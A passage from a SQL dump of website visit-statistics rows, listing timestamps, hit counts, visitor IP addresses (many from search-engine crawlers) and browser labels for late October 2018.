,0,'8.29.198.25','other'),(321664,1540788828,1,1,0,0,'8.29.198.26','other'),(321665,1540789254,2,2,0,0,'66.249.64.199','chrome'),(321666,1540789255,1,1,0,0,'66.249.64.220','chrome'),(321667,1540789311,1,1,0,0,'178.154.244.29','other'),(321668,1540789492,4,4,0,0,'216.244.66.241','other'),(321669,1540789537,1,1,0,0,'46.229.168.143','other'),(321670,1540789539,1,1,0,0,'46.229.168.154','other'),(321671,1540789550,4,4,0,0,'66.249.64.218','chrome'),(321672,1540790572,1,1,0,0,'66.249.64.44','chrome'),(321673,1540790633,1,1,0,0,'66.249.64.220','chrome'),(321674,1540790971,1,1,0,0,'95.163.255.99','other'),(321675,1540790973,1,1,0,0,'95.163.255.92','other'),(321676,1540791160,2,2,0,0,'216.244.66.241','other'),(321677,1540791357,1,1,0,0,'66.249.64.42','chrome'),(321678,1540791848,1,1,0,0,'8.29.198.27','other'),(321679,1540792500,2,2,0,0,'66.249.64.222','chrome'),(321680,1540792522,6,6,0,0,'66.249.64.218','chrome'),(321681,1540792694,1,1,0,0,'66.249.64.44','chrome'),(321682,1540792813,1,1,0,0,'91.196.178.133','chrome'),(321683,1540793403,1,1,0,0,'157.55.39.136','other'),(321684,1540793777,1,1,0,0,'66.249.64.42','chrome'),(321685,1540794004,1,1,0,0,'66.249.64.44','chrome'),(321686,1540794286,1,1,0,0,'66.249.64.199','chrome'),(321687,1540794303,1,1,0,0,'66.249.64.220','chrome'),(321688,1540794459,5,5,0,0,'91.196.178.89','chrome'),(321689,1540795046,1,1,0,0,'66.249.64.218','chrome'),(321690,1540795843,2,2,0,0,'37.55.224.59','chrome'),(321691,1540796285,2,2,0,0,'66.249.64.42','chrome'),(321692,1540796345,2,2,0,0,'178.95.198.110','firefox'),(321693,1540796557,1,1,0,0,'66.249.64.218','chrome'),(321694,1540797167,3,3,0,0,'91.196.177.46','chrome'),(321695,1540797551,1,1,0,0,'66.249.64.44','chrome'),(321696,1540798292,2,2,0,0,'91.196.178.89','chrome'),(321697,1540798796,1,1,0,0,'46.229.168.149','other'),(321698,1540798801,1,1,0,0,'46.229.168.143','other'),(321699,1540799064,2,2,0,0,'195.24.128.88','firefox'),(321700,1540799289,2,2,0,0,'91.196.178.89','chrome'),(321701,1540799332,1,1,0,0,'8.29.198.27','other'),(321702,1540799688,1,1,0,0,'66.249.64.42','chrome'),(321703,1540799690,1,1,0,0,'8.29.198.25','other'),(321704,1540799996,4,4,0,0,'91.196.178.168','chrome'),(321705,1540800343,1,1,0,0,'66.249.64.222','chrome'),(321706,1540800898,1,1,0,0,'62.205.134.182','msie'),(321707,1540801294,1,1,0,0,'66.249.64.218','chrome'),(321708,1540801587,2,2,0,0,'91.196.178.89','chrome'),(321709,1540802037,1,1,0,0,'37.53.91.228','chrome'),(321710,1540802362,4,4,0,0,'216.244.66.241','other'),(321711,1540802685,1,1,0,0,'8.29.198.26','other'),(321712,1540802742,2,2,0,0,'91.196.178.89','chrome'),(321713,1540803104,1,1,0,0,'54.208.102.37','other'),(321714,1540803105,1,1,0,0,'107.21.1.8','other'),(321715,1540803667,2,2,0,0,'91.196.178.75','firefox'),(321716,1540805282,1,1,0,0,'178.62.237.202','chrome'),(321717,1540805797,3,3,0,0,'91.196.178.89','chrome'),(321718,1540806069,1,1,0,0,'146.185.157.155','chrome'),(321719,1540806321,2,2,0,0,'185.244.39.4','other'),(321720,1540806481,1,1,0,0,'66.249.64.199','chrome'),(321721,1540806482,2,2,0,0,'66.249.64.222','chrome'),(321722,1540806490,1,1,0,0,'40.77.167.74','other'),(321723,1540806596,1,1,0,0,'178.62.237.202','chrome'),(321724,1540806632,1,1,0,0,'107.21.1.8','other'),(321725,1540806634,2,2,0,0,'195.69.222.122','chrome'),(321726,1540806635,1,1,0,0,'54.208.102.37','other'),(321727,1540806734,1,1,0,0,'178.154.244.29','other'),(321728,1540806739,1,1,0,0,'178.154.244.11','other'),(321729,1540807187,2,2,0,0,'91.196.178.89','chrome'),(321730,1540807281,1,1,0,0,'66.249.64.195','chrome'),(321731,1540808677,1,1,0,0,'66.249.64.42','chrome'),(321732,1540808890,2,2,0,0,'217.117.75.167','firefox'),(321733,1540808954,1,1,0,0,'157.55.39.136','other'),(321734,1540809557,6,6,0,0,'69.30.211.2','other'),(321735,1540809659,2,2,0,0,'95.132.36.141','firefox'),(321736,1540809682,1,1,0,0,'37.55.224.59','chrome'),(321737,1540809802,2,2,0,0,'193.107.168.62','chrome'),(321738,1540809803,3,3,0,0,'95.163.255.113','other'),(321739,1540809810,2,2,0,0,'95.163.255.106','other'),(321740,1540809817,2,2,0,0,'95.163.255.116','other'),(321741,1540809825,3,3,0,0,'95.163.255.119','other'),(321742,1540809842,1,1,0,0,'95.163.255.103','other'),(321743,1540809851,1,1,0,0,'95.163.255.115','other'),(321744,1540809891,1,1,0,0,'95.163.255.104','other'),(321745,1540809899,4,4,0,0,'95.163.255.114','other'),(321746,1540809907,2,2,0,0,'95.163.255.109','other'),(321747,1540809930,2,2,0,0,'95.163.255.105','other'),(321748,1540809939,2,2,0,0,'95.163.255.112','other'),(321749,1540809961,1,1,0,0,'95.163.255.102','other'),(321750,1540809976,1,1,0,0,'95.163.255.107','other'),(321751,1540810015,1,1,0,0,'40.77.167.1','other'),(321752,1540810144,1,1,0,0,'5.188.210.51','chrome'),(321753,1540810158,1,1,0,0,'8.29.198.27','other'),(321754,1540810527,1,1,0,0,'8.29.198.26','other'),(321755,1540810899,2,2,0,0,'91.209.214.11','chrome'),(321756,1540811377,1,1,0,0,'106.38.241.132','other'),(321757,1540811703,1,1,0,0,'66.249.64.218','chrome'),(321758,1540811892,1,1,0,0,'62.205.134.182','msie'),(321759,1540812405,1,1,0,0,'95.163.255.115','other'),(321760,1540812412,1,1,0,0,'95.163.255.119','other'),(321761,1540812422,1,1,0,0,'95.163.255.116','other'),(321762,1540813031,4,4,0,0,'46.30.166.126','chrome'),(321763,1540813521,1,1,0,0,'8.29.198.27','other'),(321764,1540813795,1,1,0,0,'66.249.64.222','chrome'),(321765,1540813847,1,1,0,0,'106.38.241.132','other'),(321766,1540814562,4,4,0,0,'91.209.11.236','other'),(321767,1540814938,2,2,0,0,'46.175.23.29','firefox'),(321768,1540814970,1,1,0,0,'180.76.15.144','other'),(321769,1540814971,1,1,0,0,'180.76.15.135','other'),(321770,1540815214,2,2,0,0,'91.196.178.134','firefox'),(321771,1540815545,1,1,0,0,'66.249.64.199','chrome'),(321772,1540815615,4,4,0,0,'91.209.11.236','other'),(321773,1540815928,1,1,0,0,'66.249.64.42','chrome'),(321774,1540816041,1,1,0,0,'178.154.244.29','other'),(321775,1540816042,1,1,0,0,'178.154.244.11','other'),(321776,1540816754,1,1,0,0,'46.229.168.129','other'),(321777,1540816756,1,1,0,0,'46.229.168.151','other'),(321778,1540816810,4,4,0,0,'91.209.11.236','other'),(321779,1540816970,1,1,0,0,'180.76.15.150','other'),(321780,1540816971,1,1,0,0,'180.76.15.8','other'),(321781,1540816998,3,3,0,0,'91.196.178.45','chrome'),(321782,1540817259,1,1,0,0,'66.249.64.195','chrome'),(321783,1540817260,1,1,0,0,'66.249.64.218','chrome'),(321784,1540817443,1,1,0,0,'66.249.64.44','chrome'),(321785,1540817536,1,1,0,0,'66.249.64.57','chrome'),(321786,1540817537,1,1,0,0,'66.249.64.42','chrome'),(321787,1540817605,1,1,0,0,'66.249.64.220','chrome'),(321788,1540817857,4,4,0,0,'91.209.11.236','other'),(321789,1540818013,2,2,0,0,'82.207.49.154','firefox'),(321790,1540818646,1,1,0,0,'216.244.66.241','other'),(321791,1540818711,11,11,0,0,'91.196.178.186','chrome'),(321792,1540818970,1,1,0,0,'180.76.15.18','other'),(321793,1540818971,1,1,0,0,'180.76.15.134','other'),(321794,1540818996,2,2,0,0,'163.172.4.153','firefox'),(321795,1540819050,4,4,0,0,'66.249.64.222','chrome'),(321796,1540819155,2,2,0,0,'66.249.64.42','chrome'),(321797,1540819293,139,139,0,0,'66.249.64.218','chrome'),(321798,1540819332,10,10,0,0,'66.249.64.220','chrome'),(321799,1540819538,1,1,0,0,'66.249.64.40','chrome'),(321800,1540819921,2,2,0,0,'66.249.64.44','chrome'),(321801,1540820085,3,3,0,0,'66.249.64.222','chrome'),(321802,1540820227,1,1,0,0,'66.249.64.199','chrome'),(321803,1540820394,1,1,0,0,'91.221.211.12','chrome'),(321804,1540820525,2,2,0,0,'66.249.64.40','chrome'),(321805,1540820615,2,2,0,0,'216.244.66.241','other'),(321806,1540820696,60,60,0,0,'66.249.64.218','chrome'),(321807,1540820783,2,2,0,0,'66.249.64.42','chrome'),(321808,1540820789,5,5,0,0,'66.249.64.220','chrome'),(321809,1540820981,1,1,0,0,'8.29.198.25','other'),(321810,1540821371,1,1,0,0,'8.29.198.27','other'),(321811,1540821392,6,6,0,0,'66.249.64.44','chrome'),(321812,1540821427,19,19,0,0,'66.249.64.40','chrome'),(321813,1540821548,2,2,0,0,'95.163.255.96','other'),(321814,1540821599,25,25,0,0,'66.249.64.218','chrome'),(321815,1540821662,2,2,0,0,'66.249.64.222','chrome'),(321816,1540821798,1,1,0,0,'66.249.64.220','chrome'),(321817,1540821802,10,10,0,0,'66.249.64.42','chrome'),(321818,1540822012,1,1,0,0,'66.249.64.199','chrome'),(321819,1540822288,11,11,0,0,'178.154.244.29','other'),(321820,1540822370,1,1,0,0,'66.249.64.44','chrome'),(321821,1540822395,19,19,0,0,'66.249.64.40','chrome'),(321822,1540822578,1,1,0,0,'157.55.39.136','other'),(321823,1540822720,1,1,0,0,'178.154.244.11','other'),(321824,1540822723,2,2,0,0,'193.0.247.178','firefox'),(321825,1540822797,2,2,0,0,'66.249.64.220','chrome'),(321826,1540822846,4,4,0,0,'91.196.178.89','chrome'),(321827,1540822888,1,1,0,0,'94.178.226.188','chrome'),(321828,1540822939,1,1,0,0,'66.249.64.222','chrome'),(321829,1540823027,11,11,0,0,'66.249.64.42','chrome'),(321830,1540823312,9,9,0,0,'66.249.64.40','chrome'),(321831,1540823344,4,4,0,0,'66.249.64.44','chrome'),(321832,1540823472,4,4,0,0,'178.154.244.29','other'),(321833,1540823479,1,1,0,0,'66.249.64.218','chrome'),(321834,1540824320,1,1,0,0,'46.211.24.103','chrome'),(321835,1540824356,4,4,0,0,'178.154.244.11','other'),(321836,1540824358,1,1,0,0,'8.29.198.27','other'),(321837,1540824374,1,1,0,0,'37.9.113.103','other'),(321838,1540824380,1,1,0,0,'37.9.113.20','other'),(321839,1540824542,3,3,0,0,'178.154.244.29','other'),(321840,1540824736,4,4,0,0,'66.249.64.44','chrome'),(321841,1540824838,2,2,0,0,'91.196.178.87','chrome'),(321842,1540824874,1,1,0,0,'66.249.64.40','chrome'),(321843,1540824901,2,2,0,0,'217.117.75.167','firefox'),(321844,1540824906,2,2,0,0,'66.249.64.42','chrome'),(321845,1540824995,2,2,0,0,'91.196.178.172','chrome'),(321846,1540825009,4,4,0,0,'5.45.207.79','other'),(321847,1540825337,3,3,0,0,'66.249.75.220','chrome'),(321848,1540825394,4,4,0,0,'66.249.75.218','chrome'),(321849,1540825407,5,5,0,0,'66.249.75.15','chrome'),(321850,1540825470,4,4,0,0,'178.154.244.29','other'),(321852,1540825472,1,1,0,0,'5.45.207.19','other'),(321853,1540825474,1,1,0,0,'87.250.224.47','other'),(321854,1540825537,2,2,0,0,'178.154.244.11','other'),(321855,1540825745,2,2,0,0,'66.249.75.16','chrome'),(321856,1540825787,5,5,0,0,'66.249.75.13','chrome'),(321857,1540826481,7,7,0,0,'178.154.244.29','other'),(321858,1540826522,1,1,0,0,'46.229.168.144','other'),(321859,1540826524,1,1,0,0,'46.229.168.153','other'),(321860,1540826563,1,1,0,0,'40.77.167.74','other'),(321861,1540826583,3,3,0,0,'178.154.244.11','other'),(321862,1540826636,3,3,0,0,'66.249.75.220','chrome'),(321863,1540826692,15,15,0,0,'66.249.75.13','chrome'),(321864,1540826743,3,3,0,0,'66.249.75.222','chrome'),(321865,1540826787,2,2,0,0,'66.249.75.218','chrome'),(321866,1540826810,3,3,0,0,'66.249.75.16','chrome'),(321867,1540826821,2,2,0,0,'91.196.178.85','firefox'),(321868,1540826840,1,1,0,0,'188.230.43.254','other'),(321869,1540826902,14,14,0,0,'66.249.75.15','chrome'),(321870,1540827164,32,32,0,0,'144.76.119.201','other'),(321871,1540827200,1,1,0,0,'5.255.253.16','other'),(321872,1540827597,10,10,0,0,'66.249.75.13','chrome'),(321873,1540827645,5,5,0,0,'178.154.244.29','other'),(321874,1540827646,1,1,0,0,'178.154.244.11','other'),(321875,1540827682,1,1,0,0,'216.244.66.241','other'),(321876,1540827710,1,1,0,0,'40.77.167.74','other'),(321877,1540827722,1,1,0,0,'66.249.75.16','chrome'),(321878,1540827973,1,1,0,0,'5.45.207.79','other'),(321879,1540828506,1,1,0,0,'66.249.75.13','chrome'),(321880,1540828508,1,1,0,0,'196.52.43.76','other'),(321881,1540829228,1,1,0,0,'188.230.43.254','other'),(321882,1540829354,1,1,0,0,'5.45.207.19','other'),(321883,1540829355,1,1,0,0,'178.154.244.29','other'),(321884,1540829800,1,1,0,0,'207.46.13.160','other'),(321885,1540830082,2,2,0,0,'66.249.75.15','chrome'),(321886,1540830567,1,1,0,0,'62.205.134.182','msie'),(321888,1540830731,1,1,0,0,'66.249.75.222','chrome'),(321889,1540830974,2,2,0,0,'178.154.244.29','other'),(321890,1540831631,1,1,0,0,'188.230.43.254','other'),(321891,1540831810,2,2,0,0,'8.29.198.27','other'),(321892,1540831819,1,1,0,0,'62.205.134.182','msie'),(321893,1540831883,1,1,0,0,'66.249.75.13','chrome'),(321894,1540832350,1,1,0,0,'66.249.75.218','chrome'),(321895,1540832409,1,1,0,0,'178.154.244.29','other'),(321897,1540832478,1,1,0,0,'178.154.244.11','other'),(321898,1540832708,3,3,0,0,'91.196.178.167','chrome'),(321899,1540832757,1,1,0,0,'95.163.255.94','other'),(321900,1540832761,1,1,0,0,'95.163.255.92','other'),(321901,1540832835,2,2,0,0,'207.46.13.160','other'),(321902,1540833301,3,3,0,0,'91.196.178.37','chrome'),(321903,1540833587,1,1,0,0,'66.249.75.199','chrome'),(321904,1540833622,1,1,0,0,'66.249.75.218','chrome'),(321905,1540833799,2,2,0,0,'157.55.39.136','other'),(321906,1540833884,1,1,0,0,'66.249.69.144','chrome'),(321907,1540834900,4,4,0,0,'94.23.196.106','other'),(321908,1540835190,1,1,0,0,'8.29.198.27','other'),(321909,1540835527,1,1,0,0,'66.249.75.218','chrome'),(321910,1540835671,1,1,0,0,'66.249.75.13','chrome'),(321911,1540836142,1,1,0,0,'95.163.255.97','other'),(321912,1540836144,1,1,0,0,'95.163.255.95','other'),(321913,1540836435,2,2,0,0,'52.53.201.78','chrome'),(321914,1540837543,1,0,1,0,'66.249.69.157',''),(321915,1540837545,1,0,1,0,'66.249.69.140',''),(321916,1540838524,2,2,0,0,'216.244.66.241','other'),(321917,1540838755,4,4,0,0,'46.4.106.120','other'),(321918,1540839145,3,3,0,0,'46.211.109.61','chrome'),(321919,1540839311,1,1,0,0,'66.249.69.156','chrome'),(321920,1540839312,1,1,0,0,'66.249.69.144','chrome'),(321921,1540839323,1,1,0,0,'66.249.75.201','chrome'),(321922,1540840127,1,1,0,0,'5.58.64.186','msie'),(321923,1540840820,1,1,0,0,'66.249.75.199','chrome'),(321924,1540840850,1,1,0,0,'66.249.75.220','chrome'),(321925,1540840993,2,2,0,0,'95.163.255.92','other'),(321926,1540840995,3,3,0,0,'95.163.255.94','other'),(321927,1540841253,1,1,0,0,'66.249.75.13','chrome'),(321928,1540841889,1,1,0,0,'95.163.255.95','other'),(321929,1540841995,13,13,0,0,'69.30.198.186','other'),(321930,1540842096,1,1,0,0,'40.77.167.74','other'),(321931,1540842262,2,2,0,0,'93.75.8.57','firefox'),(321932,1540842288,1,1,0,0,'46.229.168.147','other'),(321933,1540842295,1,1,0,0,'46.229.168.134','other'),(321934,1540842640,1,1,0,0,'8.29.198.26','other'),(321935,1540842795,2,2,0,0,'66.249.75.195','chrome'),(321936,1540842796,3,3,0,0,'66.249.75.218','chrome'),(321937,1540843057,1,1,0,0,'8.29.198.27','other'),(321938,1540843360,1,1,0,0,'66.249.69.156','chrome'),(321939,1540843406,1,1,0,0,'66.249.75.16','chrome'),(321940,1540843415,1,1,0,0,'40.77.169.22','other'),(321941,1540843482,4,4,0,0,'46.211.109.61','chrome'),(321942,1540843932,2,2,0,0,'95.163.255.96','other'),(321943,1540844387,1,1,0,0,'66.249.75.218','chrome'),(321944,1540844406,2,2,0,0,'157.55.39.136','other'),(321945,1540844817,1,1,0,0,'66.249.75.16','chrome'),(321946,1540844882,1,1,0,0,'66.249.75.30','chrome'),(321947,1540844883,2,2,0,0,'66.249.75.13','chrome'),(321948,1540845062,1,1,0,0,'207.46.13.160','other'),(321949,1540845387,1,1,0,0,'66.249.75.220','chrome'),(321950,1540845715,1,1,0,0,'180.76.15.157','other'),(321951,1540845716,1,1,0,0,'180.76.15.159','other'),(321952,1540846018,1,1,0,0,'8.29.198.26','other'),(321953,1540846223,3,3,0,0,'178.251.106.240','chrome'),(321954,1540846392,2,2,0,0,'66.249.75.16','chrome'),(321955,1540846408,3,3,0,0,'66.249.75.220','chrome'),(321956,1540846415,6,6,0,0,'66.249.75.218','chrome'),(321957,1540846540,1,1,0,0,'216.244.66.241','other'),(321958,1540846815,1,1,0,0,'66.249.75.15','chrome'),(321959,1540847289,2,2,0,0,'95.163.255.96','other'),(321960,1540847293,1,1,0,0,'95.163.255.98','other'),(321961,1540847405,1,1,0,0,'95.163.255.94','other'),(321962,1540848065,1,1,0,0,'66.249.75.222','chrome'),(321963,1540848157,2,2,0,0,'66.249.75.16','chrome'),(321964,1540848333,1,1,0,0,'66.249.75.195','chrome'),(321965,1540848347,1,1,0,0,'66.249.75.218','chrome'),(321966,1540848388,2,2,0,0,'193.142.219.177','chrome'),(321967,1540848416,3,3,0,0,'66.249.75.15','chrome'),(321968,1540848675,3,3,0,0,'66.249.75.13','chrome'),(321969,1540848758,2,2,0,0,'66.249.69.140','chrome'),(321970,1540848871,1,1,0,0,'66.249.69.156','chrome'),(321971,1540849073,2,2,0,0,'66.249.69.142','chrome'),(321972,1540849526,1,1,0,0,'95.163.255.96','other'),(321973,1540849529,1,1,0,0,'95.163.255.98','other'),(321974,1540849544,1,1,0,0,'157.55.39.136','other'),(321975,1540850093,1,1,0,0,'66.249.69.142','chrome'),(321976,1540850399,1,1,0,0,'66.249.75.220','chrome'),(321977,1540850949,1,1,0,0,'46.211.72.59','chrome'),(321978,1540851775,2,2,0,0,'66.249.75.220','chrome'),(321979,1540851980,1,1,0,0,'66.249.75.15','chrome'),(321980,1540852122,1,1,0,0,'66.249.69.156','chrome'),(321981,1540852135,1,1,0,0,'66.249.69.140','chrome'),(321982,1540852136,2,2,0,0,'207.46.13.160','other'),(321983,1540852628,1,1,0,0,'66.249.75.218','chrome'),(321984,1540853117,1,1,0,0,'46.229.168.129','other'),(321985,1540853119,1,1,0,0,'46.229.168.150','other'),(321986,1540853464,1,1,0,0,'8.29.198.27','other'),(321987,1540853799,1,1,0,0,'180.76.15.19','other'),(321988,1540853881,2,2,0,0,'216.244.66.241','other'),(321989,1540853893,1,1,0,0,'8.29.198.25','other'),(321990,1540854058,1,1,0,0,'178.154.244.29','other'),(321991,1540854059,1,1,0,0,'178.154.244.11','other'),(321992,1540855636,2,2,0,0,'157.55.39.136','other'),(321993,1540855799,1,1,0,0,'202.46.49.130','chrome'),(321994,1540855948,1,1,0,0,'5.188.210.51','chrome'),(321995,1540856847,1,1,0,0,'8.29.198.27','other'),(321996,1540857382,1,1,0,0,'66.249.75.15','chrome'),(321997,1540857727,1,1,0,0,'46.229.168.144','other'),(321998,1540857729,1,1,0,0,'46.229.168.143','other'),(321999,1540857799,1,1,0,0,'104.193.88.243','chrome'),(322000,1540857822,1,1,0,0,'216.244.66.241','other'),(322001,1540857859,1,1,0,0,'46.229.168.139','other'),(322002,1540857861,1,1,0,0,'46.229.168.146','other'),(322003,1540858153,2,2,0,0,'34.208.12.88','chrome'),(322004,1540858486,1,1,0,0,'207.46.13.160','other'),(322005,1540858924,1,1,0,0,'66.249.75.195','chrome'),(322006,1540858925,1,1,0,0,'66.249.75.220','chrome'),(322007,1540859244,1,1,0,0,'66.249.75.15','chrome'),(322008,1540860241,1,1,0,0,'66.249.75.222','chrome'),(322009,1540860379,1,1,0,0,'207.46.13.160','other'),(322010,1540860537,1,1,0,0,'66.249.75.13','chrome'),(322011,1540860558,1,1,0,0,'66.249.75.218','chrome'),(322012,1540860712,1,1,0,0,'95.163.255.97','other'),(322013,1540860716,1,1,0,0,'95.163.255.96','other'),(322014,1540861261,1,1,0,0,'46.229.168.141','other'),(322015,1540861264,1,1,0,0,'46.229.168.140','other'),(322016,1540861684,1,1,0,0,'216.244.66.241','other'),(322017,1540864300,2,2,0,0,'8.29.198.25','other'),(322018,1540864309,3,3,0,0,'178.154.244.29','other'),(322019,1540864613,1,1,0,0,'46.229.168.129','other'),(322020,1540864615,1,1,0,0,'46.229.168.133','other'),(322021,1540865064,1,1,0,0,'141.8.142.103','other'),(322023,1540865217,11,11,0,0,'178.154.244.29','other'),(322024,1540865368,1,1,0,0,'178.154.244.11','other'),(322025,1540865721,1,1,0,0,'46.229.168.140','other'),(322026,1540865723,1,1,0,0,'46.229.168.139','other'),(322027,1540865982,3,3,0,0,'66.249.75.218','chrome'),(322028,1540866099,1,1,0,0,'66.249.75.195','chrome'),(322029,1540866144,3,3,0,0,'178.154.244.29','other'),(322030,1540866316,1,1,0,0,'66.249.75.29','chrome'),(322031,1540866319,1,1,0,0,'66.249.75.16','chrome'),(322032,1540866452,1,1,0,0,'40.77.167.74','other'),(322033,1540866862,4,4,0,0,'178.154.244.11','other'),(322034,1540867453,4,4,0,0,'178.154.244.29','other'),(322036,1540867678,1,1,0,0,'8.29.198.25','other'),(322037,1540868079,1,1,0,0,'178.154.244.11','other'),(322038,1540868625,1,1,0,0,'46.229.168.152','other'),(322039,1540868627,1,1,0,0,'46.229.168.140','other'),(322040,1540868874,1,1,0,0,'95.163.255.98','other'),(322041,1540868877,1,1,0,0,'95.163.255.94','other'),(322042,1540869151,2,2,0,0,'34.216.100.29','chrome'),(322043,1540869250,1,1,0,0,'178.154.244.29','other'),(322044,1540869438,1,1,0,0,'216.244.66.241','other'),(322045,1540869546,1,1,0,0,'5.45.207.79','other'),(322047,1540870984,2,2,0,0,'178.154.171.27','other'),(322048,1540871754,1,1,0,0,'95.163.255.98','other'),(322049,1540871758,1,1,0,0,'95.163.255.94','other'),(322050,1540871803,1,1,0,0,'95.163.255.93','other'),(322051,1540871804,1,1,0,0,'95.163.255.92','other'),(322052,1540873061,1,1,0,0,'46.229.168.129','other'),(322053,1540873063,1,1,0,0,'46.229.168.138','other'),(322054,1540873820,1,1,0,0,'46.229.168.147','other'),(322055,1540873821,1,1,0,0,'46.229.168.150','other'),(322056,1540874123,1,1,0,0,'66.249.75.13','chrome'),(322057,1540874447,1,1,0,0,'95.163.255.99','other'),(322058,1540874449,1,1,0,0,'95.163.255.94','other'),(322059,1540874524,1,1,0,0,'66.102.9.136','chrome'),(322060,1540874529,1,1,0,0,'46.211.10.29','chrome'),(322061,1540875125,2,2,0,0,'8.29.198.26','other'),(322062,1540875270,2,2,0,0,'54.36.222.37','chrome'),(322063,1540877363,1,1,0,0,'157.55.13.64','other'),(322064,1540877388,1,1,0,0,'95.163.255.99','other'),(322065,1540877392,1,1,0,0,'95.163.255.95','other'),(322066,1540878126,1,1,0,0,'207.46.13.160','other'),(322067,1540878306,1,1,0,0,'40.77.167.1','other'),(322068,1540878505,1,1,0,0,'8.29.198.27','other'),(322069,1540878889,1,1,0,0,'46.229.168.136','other'),(322070,1540878891,1,1,0,0,'46.229.168.129','other'),(322071,1540879791,1,1,0,0,'66.249.75.222','chrome'),(322072,1540879866,1,1,0,0,'95.163.255.93','other'),(322073,1540879869,1,1,0,0,'95.163.255.95','other'),(322074,1540880267,2,2,0,0,'91.196.177.46','firefox'),(322075,1540880558,2,2,0,0,'91.196.178.90','firefox'),(322076,1540880995,1,1,0,0,'46.229.168.147','other'),(322077,1540880997,1,1,0,0,'46.229.168.139','other'),(322078,1540881017,1,1,0,0,'66.249.75.201','chrome'),(322079,1540881290,3,3,0,0,'91.196.178.168','chrome'),(322080,1540881493,2,2,0,0,'91.196.178.89','chrome'),(322081,1540881931,1,1,0,0,'216.244.66.241','other'),(322082,1540882778,1,1,0,0,'66.249.69.142','chrome'),(322083,1540882796,1,1,0,0,'46.229.168.136','other'),(322084,1540882799,1,1,0,0,'46.229.168.145','other'),(322085,1540882891,1,1,0,0,'66.249.75.218','chrome'),(322086,1540883133,2,2,0,0,'91.196.178.89','chrome'),(322087,1540883533,1,1,0,0,'91.196.179.138','chrome'),(322088,1540883757,1,1,0,0,'66.249.75.220','chrome'),(322089,1540883802,2,2,0,0,'66.249.75.218','chrome'),(322090,1540883892,1,1,0,0,'66.249.69.140','chrome'),(322091,1540884236,1,1,0,0,'46.229.168.152','other'),(322092,1540884239,1,1,0,0,'46.229.168.141','other'),(322093,1540884510,1,1,0,0,'66.249.75.195','chrome'),(322095,1540884577,1,1,0,0,'66.249.69.156','chrome'),(322097,1540884614,1,1,0,0,'66.249.75.199','chrome'),(322098,1540884832,1,1,0,0,'40.77.167.1','other'),(322099,1540885736,1,1,0,0,'66.249.75.201','chrome'),(322100,1540885870,2,2,0,0,'91.196.178.172','chrome'),(322101,1540885901,2,2,0,0,'66.249.75.195','chrome'),(322102,1540885954,2,2,0,0,'216.244.66.241','other'),(322103,1540886310,1,1,0,0,'62.205.134.182','msie'),(322104,1540886626,9,9,0,0,'37.55.224.62','chrome'),(322105,1540886672,2,2,0,0,'217.117.64.133','firefox'),(322106,1540886992,1,1,0,0,'91.196.178.165','firefox'),(322107,1540887497,1,1,0,0,'66.249.69.144','chrome'),(322108,1540887591,2,2,0,0,'95.132.49.55','firefox'),(322109,1540887647,1,1,0,0,'23.103.64.39','other'),(322110,1540887721,1,1,0,0,'8.29.198.27','other'),(322111,1540888099,4,4,0,0,'91.196.177.15','chrome'),(322112,1540888144,2,2,0,0,'66.249.75.201','chrome'),(322113,1540888145,2,2,0,0,'66.249.75.218','chrome'),(322114,1540888255,2,2,0,0,'94.178.227.61','firefox'),(322115,1540888310,1,1,0,0,'66.249.75.220','chrome'),(322116,1540888430,1,1,0,0,'66.249.75.199','chrome'),(322117,1540888918,1,1,0,0,'8.29.198.26','other'),(322118,1540889229,1,1,0,0,'66.249.75.195','chrome'),(322119,1540889231,1,1,0,0,'66.249.75.218','chrome'),(322120,1540889333,2,2,0,0,'95.213.141.126','opera'),(322121,1540889747,2,2,0,0,'66.249.75.201','chrome'),(322122,1540889748,1,1,0,0,'66.249.75.222','chrome'),(322123,1540889920,1,1,0,0,'8.29.198.25','other'),(322124,1540890182,3,3,0,0,'66.249.75.218','chrome'),(322125,1540890192,1,1,0,0,'66.249.75.199','chrome'),(322126,1540890198,1,1,0,0,'196.52.43.80','other'),(322127,1540890582,2,2,0,0,'37.53.228.75','chrome'),(322128,1540890797,2,2,0,0,'91.196.178.90','firefox'),(322129,1540890956,1,1,0,0,'40.77.167.40','other'),(322130,1540890967,1,1,0,0,'66.249.69.140','chrome'),(322131,1540891411,3,3,0,0,'66.249.69.144','chrome'),(322132,1540891910,3,3,0,0,'66.249.69.140','chrome'),(322133,1540891951,1,1,0,0,'94.178.226.188','chrome'),(322134,1540891985,7,7,0,0,'66.249.69.142','chrome'),(322135,1540892066,1,1,0,0,'66.249.75.222','chrome'),(322136,1540892381,1,1,0,0,'178.154.244.29','other'),(322137,1540892435,1,1,0,0,'66.249.69.144','chrome'),(322138,1540892453,1,1,0,0,'216.244.66.241','other'),(322139,1540892765,1,1,0,0,'66.249.75.218','chrome'),(322140,1540892999,7,7,0,0,'66.249.69.140','chrome'),(322141,1540893462,9,9,0,0,'66.249.69.142','chrome'),(322142,1540893676,2,2,0,0,'66.249.75.218','chrome'),(322143,1540893736,4,4,0,0,'66.249.69.144','chrome'),(322144,1540893901,16,16,0,0,'66.249.69.140','chrome'),(322145,1540894026,1,1,0,0,'93.119.227.19','chrome'),(322146,1540894027,1,1,0,0,'93.119.227.19','other'),(322149,1540894046,2,2,0,0,'93.119.227.91','other'),(322150,1540894047,1,1,0,0,'69.4.87.74','other'),(322152,1540894414,1,1,0,0,'66.249.69.142','chrome'),(322153,1540894474,1,1,0,0,'66.249.75.222','chrome'),(322154,1540894669,1,1,0,0,'66.249.75.218','chrome'),(322155,1540894949,1,1,0,0,'91.196.178.89','chrome'),(322156,1540895249,20,20,0,0,'66.249.69.140','chrome'),(322157,1540895257,2,2,0,0,'37.73.125.195','chrome'),(322158,1540895323,1,1,0,0,'40.77.167.40','other'),(322159,1540895355,8,8,0,0,'66.249.69.144','chrome'),(322160,1540895527,10,10,0,0,'66.249.69.142','chrome'),(322161,1540895671,1,1,0,0,'66.249.79.74','chrome'),(322162,1540896152,8,8,0,0,'66.249.69.140','chrome'),(322163,1540896348,1,1,0,0,'66.249.75.13','chrome'),(322164,1540896454,1,1,0,0,'66.249.75.218','chrome'),(322165,1540896506,1,1,0,0,'66.249.69.144','chrome'),(322166,1540896738,2,2,0,0,'91.196.178.92','chrome'),(322167,1540897063,2,2,0,0,'66.249.69.142','chrome'),(322168,1540897085,10,10,0,0,'66.249.75.15','chrome'),(322169,1540897101,2,2,0,0,'66.249.69.140','chrome'),(322170,1540897176,3,3,0,0,'66.249.75.16','chrome'),(322171,1540897251,15,15,0,0,'66.249.75.13','chrome'),(322172,1540897258,2,2,0,0,'66.249.75.29','chrome'),(322173,1540897756,1